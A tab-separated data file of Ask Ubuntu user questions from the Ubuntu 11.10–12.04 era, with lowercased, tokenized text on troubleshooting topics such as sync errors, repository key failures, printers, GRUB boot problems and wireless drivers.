133322	tomboy failed to sync : ( 500 ) internal server error	i use tomboy notes , and i find it very useful to sync the notes through u1 , but today when i tried to sync , it showed an error message synchronisation failed or something similar , without any explanation in details section . that 's the text of /.config/tomboy/tomboy.log : 07/05/2012 18.10.55 [ info ] : initializing mono.addins 07/05/2012 18.10.59 [ error ] : unparsable last-sync-date element in /home/christian/.config/tomboy/manifest.xml 07/05/2012 18.11.18 [ error ] : caught exception . message : the remote server returned an error : ( 500 ) internal server error . 07/05/2012 18.11.18 [ error ] : stack trace for previous exception : at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in :0 07/05/2012 18.11.18 [ error ] : rest of stack trace for above exception : at system.environment.get_stacktrace ( ) at tomboy.websync.api.oauth.makewebrequest ( requestmethod method , system.string url , system.collections.generic.list`1 parameters , system.string postdata ) at tomboy.websync.api.oauth.webrequest ( requestmethod method , system.string url , system.string postdata ) at tomboy.websync.api.oauth.get ( system.string uri , idictionary`2 queryparameters ) at tomboy.websync.api.userinfo.getuser ( system.string useruri , iwebconnection connection ) at tomboy.websync.websyncserver.beginsynctransaction ( ) at tomboy.sync.syncmanager.synchronizationthread ( ) at system.threading.thread.startinternal ( ) 07/05/2012 18.11.18 [ error ] : synchronization failed with the following exception : the remote server returned an error : ( 500 ) internal server error . at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in :0 07/05/2012 18.11.28 [ error ] : unparsable last-sync-date element in /home/christian/.config/tomboy/manifest.xml 07/05/2012 18.12.17 [ error ] : unparsable last-sync-date element in /home/christian/.config/tomboy/manifest.xml 07/05/2012 18.12.19 [ error ] : caught exception . message : the remote server returned an error : ( 500 ) internal server error . 07/05/2012 18.12.19 [ error ] : stack trace for previous exception : at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in :0 07/05/2012 18.12.19 [ error ] : rest of stack trace for above exception : at system.environment.get_stacktrace ( ) at tomboy.websync.api.oauth.makewebrequest ( requestmethod method , system.string url , system.collections.generic.list`1 parameters , system.string postdata ) at tomboy.websync.api.oauth.webrequest ( requestmethod method , system.string url , system.string postdata ) at tomboy.websync.api.oauth.get ( system.string uri , idictionary`2 queryparameters ) at tomboy.websync.api.userinfo.getuser ( system.string useruri , iwebconnection connection ) at tomboy.websync.websyncserver.beginsynctransaction ( ) at tomboy.sync.syncmanager.synchronizationthread ( ) at system.threading.thread.startinternal ( ) 07/05/2012 18.12.19 [ error ] : synchronization failed with the following exception : the remote server returned an error : ( 500 ) internal server error . at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in :0 07/05/2012 18.21.01 [ error ] : caught exception . message : the remote server returned an error : ( 500 ) internal server error . 07/05/2012 18.21.01 [ error ] : stack trace for previous exception : at system.net.httpwebrequest.checkfinalstatus ( system.net.webasyncresult result ) [ 0x00000 ] in :0 at system.net.httpwebrequest.setresponsedata ( system.net.webconnectiondata data ) [ 0x00000 ] in :0 07/05/2012 18.21.01 [ error ] : rest of stack trace for above exception : at system.environment.get_stacktrace ( ) at tomboy.websync.api.oauth.makewebrequest ( requestmethod method , system.string url , system.collections.generic.list`1 parameters , system.string postdata ) at tomboy.websync.api.oauth.webrequest ( requestmethod method , system.string url , system.string postdata ) at tomboy.websync.api.oauth.get ( system.string uri , idictionary`2 queryparameters ) at tomboy.websync.api.userinfo.getuser ( system.string useruri , iwebconnection connection ) at tomboy.websync.websyncserver.updatesavailablesince ( int32 revision ) at tomboy.sync.syncmanager.backgroundsyncchecker ( ) at tomboy.sync.syncmanager.m__3e ( system.object o ) at system.threading.timer+scheduler.timercb ( system.object o ) and the text of ./config/tomboy/manifest.xml . 0001-01-01t00:00:00.0000000+01:00 -1 how should i fix it ? that 's not the first time i have problem with tomboy sync . it never worked with ubuntu 11.10 . i had to upgrade my os to make it work again . if the solution is too complicated or impossible , could you suggest me a good alternative ? maybe a tool of firefox ? i tried with evernote but it does n't work well with long notes
133325	why does my ubuntu 12.04 install not pull this security update ?	i have installed ubuntu 12.04 about a week ago and it is not letting me receive security updates . it has n't pulled any security updates for four days . i am connected to the internet and it is only the security repository that wo n't update . any help would be appreciated . here is the error message : failed to download repository information check your internet connection details : w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9a06aef9cb8db0 w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
133329	brightness keys on samsung x360	i recently installed 12.04 64 on my samsung x360 and most of the hot keys work ( volume , disable mousepad , num/scroll locks , display , battery ) . however , when adjusting brightness , there is only two levels - full and i guess 90 % . any suggestions on how to increase the range of brightness levels for the hotkey ? additionally wifi enable/disable does n't work either but that is less of a priority right now
133330	samsung scx - 3205w printing wierd symbols	i come here today with a problem that 's kind of driving me crazy : p i have a samsung scx - 3205w laser printer , and it was working fine with ubuntu 11.04 but when ubuntu 11.10 was launched this printer started having problems . i installed it looking at the guide from : how to define my samsung scx3200 multifunction printer ? so here is the problem , 85 % of the times i try to print something it just prints weird symbols , like little hearts , smiles , clubs , spades , anyway a lot of symbols . it starts by printing a blank page , then every single page after that has symbols and not the text/image i was trying to print i 'm using ubuntu 12.04 at the moment and the problem stays the same , tried unstalling and reinstalling using the samsung unified driver from the web page , i even made a clean format to my pc when installed the ubuntu 12.04 and nothing , i 'm beeing force to handle my printing from a windows xp virtual enviroment ( virtualbox ) any help will be appreciatted and if you need any info about my system just ask
133332	`` missing operating system '' after installing ubuntu 12.04 from a cd on a macbook pro	i followed this guide to install ubuntu 12.04 on my macbook pro 8,2 ( late 2011 ) : https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation i used a cd . i synced the partition table on refit , and it went fine . i do have an icon to boot on linux , but when i launch it , after a few seconds i have `` missing operating system '' displayed , and that 's all ... how can i fix that ? the only thing i see is , in the guide , it is mentioned this : on the last dialog of the installer , be sure to click the âadvancedâ button and choose to install the boot loader ( grub ) to your root ubuntu partition , for example /dev/sda3 . this will be the only partition with the ext4 file system . in ubuntu 12.04 installation process , there is not such an option , but there is a dropdown menu to select where the grub bootloader should be installed . it was /dev/sda by default , but i selected my root ubuntu partition ( in my case , /dev/sda5 ) . i got a warning message ( but actually , it was the same warning message even when i selected /dev/sda ) , and i continued the installation ... thanks in advance for your help !
133340	i am planning to upgrade my ubuntu 11.04 to 12.04 but confused ... should i upgrade or perform a fresh install ?	i want to perform a fresh installation with all my installed softwares and my documents safe ... can i use aptoncd to recover installed programs and my documents ... .can aptoncd do that for me ... i do n't want to upgrade because my internet connection is slow ... and my internet plan does not allow me to download a large amount of data in a day ... .it would take me many days to upgrade ... tell me what should i do also tell me about use of the software aptoncd which i downloaded from ubuntu software center ...
133343	how do i set up xrdp session that reuses an existing session ?	i have been trying to set up a rdp terminal server on precise using xrdp and have been having significant trouble getting a working configuration . when a user logs on , i need it to connect to that users existing session if it exists , otherwise starting a new session , and any started session must start lxde . what changes to the default configuration do i need to make in order for this to work ?
133344	can i update my system with a live cd ?	i 've installed ubuntu from a live cd in vmware , after that i configured everything for my need and of course i installed some additional tools . everything works fine , but regularly i receive a new live cd with updated software and some new installed tools which i need to use . is it possible to update ubuntu with the new live cd ? else i have always to reconfigure and install my personal stuff from scratch . i 'm also interested in a solution which need some action on the `` live cd-producer '' , but of course if there is something that i can do , this will be preferred .
133349	syncing a folder between laptop and linux server	i usually use dropbox or ubuntu one to sync my different devices . now i need to sync contents of a folder with a folder on a linux server . note that i may make change files on both sides . the first one is my laptop and the second is a computing server that i have ssh access to ( regular user but not root access ) .
133354	ca n't open software center due to a malformed line	when i try to open software center , the icon blinks , but nothing happens . when i type sudo software-center in my terminal i get : 2012-05-07 12:57:18,385 - softwarecenter.ui.gtk3.em - info - em 's : 17 15 21 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 151 , in < module > app = softwarecenterappgtk3 ( datadir , xapian_base_path , options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 213 , in __init__ self.cache.open ( ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 209 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 93 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 140 , in open self._list.read_main_list ( ) systemerror : e : malformed line 54 in source list /etc/apt/sources.list ( dist parse ) i have ubuntu 11.10 . i am new to linux . appreciate your help ! ! !
133355	outsource the /boot onto a ssd	now i 'm going to buy me a new laptop . so this computer uses a 500 gb 7200rpm sata hybrid hard drive with 4 gb ssd , so my question is : is it possible to just use the ssd for /boot ? does it reduce the booting time significantly ? thx for answers ! !
133360	wireless not working with an atheros ar9285	i recently installed ubuntu 12.04 and found my wireless card is not detected by os . i tired to detect it by network manager but still it is not get output of the required command : toor @ linux : ~ $ sudo lshw -class network *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : c0 serial : f0 : de : f1:9e:22:4d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=124.123.227.84 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : f2400000-f243ffff ioport:2000 ( size=128 ) *-network unclaimed description : network controller product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f2500000-f250ffff and toor @ linux : ~ $ rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no please let me know what more info is required to resolve it .
133364	how to switch between gpu 's on hp pavilion dv7 laptop ?	i have two gpus in my hp dv7 laptol and i wonder how to switch gpu i 'm using at the moment ? i have ati radeon hd 4200m and ati radeon hd 6600m running on my laptop and i want to change from hd 4200m to hd 6600m .
133377	is there any way to see which applications are the most downloaded from the software center ?	being quite used to the android market i 've always found it quite interesting to be able to see the statistics on how many times an application has been downloaded : with the ubuntu software center it seems that the only information available to sort application by is the date they were uploaded and their rating : is there any way of seeing how many times an application has been downloaded from the software center ?
133379	the battery indicator in unity panel not showing up	i installed ubuntu 12.04 with wubi . well after being completely dazzled with the amount of free content in the software centre , i decided to go deeper and start messing with settings . well after changing the screen brightness the highest level i noticed that there was n't an indicator for how much battery was left in my laptop . i looked up online on got 2 suggestions on how to fix : right click on the unity panel and add an indicator set it to show in the power settings menu . well i did both when i right click at the top menu nothing comes up and setting it to show does nothing either . then i tried installing something in the software centre . i got something but when i activated it it said i had 0 % power left even though i was charging and at % 100 according the light in the front of my laptop . so now i 'm thinking that it does n't even recognise my computer as a laptop which is weird because in the display settings it says my screen size is set to laptop . how can i install it ? i do n't know what version it is other then ubuntu 12.04 and no matter what the icon does not appear with the
133380	architecture parameter ignored by apt-get	i 'm trying to download the package wvdial and its dependencies so that i can put them on a usb stick and install them on an old mac with no internet connection . however , the command sudo apt-get -d -a powerpc install wvdial insists on downloading the packages for the architecture of the computer i run the command from ( amd64 ) . what am i doing wrong ?
133384	keyboard shortcut gnome-terminal ( ctrl-tab ) and ( ctrl-shift-tab ) in 12.04 ?	keyboard shortcuts in gnome-terminal ( ctrl+tab and ctrl+shift+tab ) in 12.04 do n't seem to be working . is there a setting that i dont know of ?
133385	getting `` system program problem detected '' pops up regularly after upgrade	this started to happen immediately after i had rebooted the first time after doing a system upgrade . it first starts with a dialogue that says `` system program problem detected '' . then when i try to hit 'report problem ' not much happens . i am led through a dialogue that always ends up the problem can not be solved . i am aware this is not a lot of information , however i 'm not sure which information i need to publish and how should i obtain it to debug this problem . here 's a screenshot !
133386	how to merge and pipe results from two different commands to single command ?	i want merge ( union ) output from two different commands , and pipe them to a single command . a silly example : commands i want to merge the output : cat wordlist.txt ls ~/folder/* into : wc -l in this example , if wordlist.txt contains 5 lines and 3 files , i want wc -l to return 8 . $ cat wordlist.txt * [ magical union thing ] * ls ~/folder/* | wc -l 8 how do i do that ?
133389	no such file or directory ? but the file exists !	i 've downloaded a game ( shank ) but the bin file does n't run . the error that is shown when i try to launch the executable is : bash : ./shank-linux-120720110-1-bin : no such file or directory
133390	why no global-menu support in libreoffice for 12.04 ?	i thought 12.04 was supposed to be a stable bug-fix release ? so why are there all these new features in 12.04 and yet long-standing bugs and ui-discrepancies still exist ? i 'd rather have a global-menu in libreoffice than silly new dash-lenses and dnsmasq and all the other stuff that should not have been added to an lts release . why does n't libreoffice have global-menu support yet ?
133393	trash bin in unity launcher shows full even when empty	i 'm having a weird problem where my trash bin in unity launcher is showing full when its not . usually it would n't bother me but its been happening so often lately its getting annoying . any assistance would be greatly appreciated .
133395	is it possible to get the menuing system in ( top of screen ) 10.04 back after upgrading ?	i was changing machines and decided to upgrade from 10.04 to 11.10 . the desktop changed significantly and i do n't like the sliding panel on the left side of the screen and would prefer the menu on the top line of the screen from 10.04 ( where the admin , system , etc . utilities could be found ) . is there a way to get this menu back or is it lost forever ? i 'm an intermediate unix user and any help/insight is appreciated .
133398	amd/ati drivers from website vs. proprietary drivers in ubuntu 12.04 repos ?	i have 2 questions regarding to different amd radeon drivers : what is the difference between the 3 ? amd/ati driver ( 12.04 repo ) amd/ati driver , post release update ( 12.04 repo ) amd/ati driver 12.4 ( amd website ) if i install the `` post release update '' driver from ubuntu repos ; will i get future driver updates from ubuntu , in other words what 's ubuntu radeon driver update policy ?
133403	during final part installation i get the message ' root ' not defined go to partioning . where can i find partioning ?	when nstalling ubuntu i get the message ' root not found ' go to partioning ( menu ) . how do i get to partioning menu ?
133406	printer share keeps asking for password and i ca n't authenticate from any machine . why ?	ubuntu 12.04 printer share keeps asking for password and i ca n't authenticate from any machine . why ? ? we 've installed it in two machine ( to act as printer servers ) and we get the same problem . it does n't matter what we do , change or install . we ca n't figure out why the printer share asks for password even using all of the users that are registered in the server . what is wrong with precise ? i want it to work without a password , but it is not even working with one ! i gave up ! the samba version that comes with precise is insufferable ! i tried various settings that did n't work . i should 've used mint from the beginning . [ edit ] my printers config . remembering that samba is 3.6.3 in ubuntu 12.04 load printers = yes [ printers ] comment = all printers browseable = yes path = /var/spool/samba printable = yes guest ok = yes readonly = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes readonly = yes guest ok = yes
133410	ubuntu one client not showing correct usage	i am using ubuntu studio 12.04 although i have noticed the same in other 12.04 variants . the dashboard of ubuntu one says that i have used up 25gigs of my 25gigs storage subscription . i am nowhere near the 25gigs . does anyone have any suggestions ?
133412	12.04 right-click on desktop , change background , application crashes	not sure why this is happening , but a simple task , such as right-clicking on my desktop , and changing the background image , results in a successful image change followed by the application not closing and then crashing . this has happened a few times and strikes me as too often . any idea what is happening ? edit : this is still happening after recent updates . not every time , but intermittently . there does n't seem to be a pattern .
133426	grub ca n't see my disks after fresh install of 12.04	i just installed 12.04 , clean , from a usb memory stick , to an asus netbook . as sda is only 4gb , i made a 1gb partition on sdb for /var ( along with a partition for swap and /home ) . i used the desktop i386 iso with unetbootin to load the memory stick . everything seemed to have worked just fine , and the netbook had been running 11.10 just fine . however , after restarting , i get 3 `` error : no such partition '' errors from grub at the boot menu . i 've started the machine back up with the memory stick to look around . the latest grub is installed on /dev/sda . ( i thought maybe it had n't `` taken . '' ) grub.cfg looks right , and the blkid 's match the internal drives . ( i thought maybe the memory stick fooled the grub installer , but it all looks good . ) if i open a grub command prompt at the boot menu , and try to do an 'ls ' , i get more `` error : no such partition '' errors . i even get the message when i try 'help ' . i 'm lost . everything i know from 15 years of running linux makes me think this thing should boot . i 've never seen this kind of error before . boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and uses an embedded config file : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - search.fs_uuid 11adf701-62df-45bd-949b-493582d3e6e4 root set prefix= ( $ root ) /boot/grub -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- - . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdc . sda1 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb1 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sdb2 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb3 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdc1 : __________________________________________ file system : vfat boot sector type : syslinux 4.05 20120131 boot sector info : syslinux looks at sector 535 of /dev/sdc1 for its second stage . the integrity of syslinux could n't be verified ( install gawk ) . syslinux is installed in the directory . the 2 adv sectors are not the same ( corrupt ) . no errors found in the boot parameter block . operating system : boot files : /syslinux.cfg /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 4034 mb , 4034838528 bytes 109 heads , 2 sectors/track , 36149 cylinders , total 7880544 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 7,878,655 7,876,608 83 linux drive : sdb _______________________________________ disk /dev/sdb : 16.1 gb , 16139354112 bytes 255 heads , 63 sectors/track , 1962 cylinders , total 31522176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 3,999,743 3,997,696 82 linux swap / solaris /dev/sdb2 3,999,744 5,953,535 1,953,792 83 linux /dev/sdb3 5,953,536 31,520,767 25,567,232 83 linux drive : sdc _______________________________________ disk /dev/sdc : 1059 mb , 1059323904 bytes 255 heads , 63 sectors/track , 128 cylinders , total 2068992 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 63 2,056,319 2,056,257 e w95 fat16 ( lba ) '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 11adf701-62df-45bd-949b-493582d3e6e4 ext4 /dev/sdb2 13102a87-bd10-48a1-9762-d52a025a7e87 ext4 /dev/sdb3 58611555-14fd-4f09-b397-667760592be6 ext4 /dev/sdc1 4eea-35af vfat sas_sata ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdc1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) =========================== sda1/boot/grub/grub.cfg : =========================== # do not edit this file # it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub # begin /etc/grub.d/00_header if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi end /etc/grub.d/00_header begin /etc/grub.d/05_debian_theme set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi end /etc/grub.d/05_debian_theme begin /etc/grub.d/10_linux function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=11adf701-62df-45bd-949b-493582d3e6e4 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 echo 'loading linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=11adf701-62df-45bd-949b-493582d3e6e4 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } end /etc/grub.d/10_linux begin /etc/grub.d/20_linux_xen end /etc/grub.d/20_linux_xen begin /etc/grub.d/20_memtest86+ menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 11adf701-62df-45bd-949b-493582d3e6e4 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } end /etc/grub.d/20_memtest86+ begin /etc/grub.d/30_os-prober if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi end /etc/grub.d/30_os-prober begin /etc/grub.d/40_custom this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . end /etc/grub.d/40_custom begin /etc/grub.d/41_custom if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sda1/etc/fstab : ================================ /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # proc /proc proc nodev , noexec , nosuid 0 0 / was on /dev/sda1 during installation uuid=11adf701-62df-45bd-949b-493582d3e6e4 / ext4 errors=remount-ro 0 1 /home was on /dev/sdb3 during installation uuid=58611555-14fd-4f09-b397-667760592be6 /home ext4 defaults 0 2 /var was on /dev/sdb2 during installation uuid=13102a87-bd10-48a1-9762-d52a025a7e87 /var ext4 defaults 0 2 swap was on /dev/sdb1 during installation uuid=75c2cadb-a0b9-4888-a034-c1379420f015 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-23-generic-pae 1 = boot/vmlinuz-3.2.0-23-generic-pae 1 = initrd.img 1 = vmlinuz 1 ============================== sdc1/syslinux.cfg : ============================== default menu.c32 prompt 0 menu title unetbootin timeout 100 label unetbootindefault menu label default kernel /ubnkern append initrd=/ubninit file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- label ubnentry0 menu label ^help kernel /ubnkern append initrd=/ubninit label ubnentry1 menu label ^try ubuntu without installing kernel /casper/vmlinuz append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- label ubnentry2 menu label ^install ubuntu kernel /casper/vmlinuz append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- label ubnentry3 menu label ^check disc for defects kernel /casper/vmlinuz append initrd=/casper/initrd.lz boot=casper integrity-check quiet splash -- label ubnentry4 menu label test ^memory kernel /install/mt86plus append initrd=/ubninit label ubnentry5 menu label ^boot from first hard disk kernel /ubnkern append initrd=/ubninit ================= sdc1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 2 ? ? = ? ? menu.c32 1 ? ? = ? ? syslinux.cfg 1 ============== sdc1 : version of com32 ( r ) files used by syslinux : =============== menu.c32 : com32r module ( v4.xx ) ========= devices which do n't seem to have a corresponding hard drive : ========= sdd =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in
133428	boot failure with 12.04 install , fixed by upgrading from 10.04	my lg laptop ( lgz1 r200 ) has been having issues since 11.04 . and a clean install of 12.04 was flaky , giving tonnes of disk errors before starting half the time -- - with 11.04 and 11.10 it gave errors but always started so i never bothered trying to fix it ... however after backing up and doing a clean install of 12.04 it would not start half the time , froze during boot , never restarting etc ... i tried several installs of 12.04 from several disks then defeated i reverted back to a clean install of 10.04 which works like a charm , and was then able to upgrade from 10.04 to 12.04 and it works , starts , not as quickly as 10.04 , but faster than it did with 11.04 or 11.10 and with no disk errors on startup . so i guess my question is , why will it upgrade , but not install directly , and is that a problem ? is it because 10.04 was pre-unity ? is it possibly a driver issue ? is it just a question of disk compatibility ?
133429	a well-supported wireless pci adapter for ubuntu 12.04 ?	i need a pci wireless adapter that works well with ubuntu 12.04 . i have looked around on the web but a lot of the information is out-of-date or confusing . could someone point me to a wireless pci adapter on newegg or amazon that they know works well with ubuntu 12.04 ? i would really appreciate it .
133435	use full install as installation media	i currently have an ubuntu laptop and external hard disk installation . i would like to know if it is possible to use these full installs , after a bit of configuration , to be used as installers to create new installations on others ' computers without copying my configuration or passwords , and without affecting my system during the installation . that is , i want to create new installations , without changing my configuration to that of the new system , and having those installations be very similar to those created by the ones created by regular media . sorry if unclear or mistagged , and feel free to edit . edit : also , remastersys does not work for me and this is not a duplicate : i need to install from booting my full installation on another system and then installing from there , not making another live cd , which i am trying to avoid . edit : i am doing this to have a better demo system that works fully , and does not suffer the issues of a live cd . i 'd preferably install from there ...
133436	how to install own cube on 12.04	ok i wanted to install owncube ( www.owncube.com ) on my ubuntu 32 bit 12.04 desktop . i still have plenty of ubuntu one space but 5gb for free , i could keep my music there since it streams for free . but i need a little help installing echo 'deb http : //download.opensuse.org/repositories/isv : owncloud : owncloud2012/xubuntu_12.04/ / ' > > /etc/apt/sources.list apt-get update apt-get install owncloud-client i tried copy/pasting the first line into terminal but can not be done . anyone know how i am supposed to do this ? i am sure it is simple but i do n't know how to do it . thank you for your time and answers
133438	missing features in ubuntu 12.04	i have recently upgraded to ubuntu 12.04 , and 2 new features that i have seen advertised on various websites are not on my version : individual wallpapers on login screen privacy options in 'settings' is there a way of getting these features , or have they just been removed ? p.s . i upgraded to 12.04 from 11.10 via the upgrade tool .
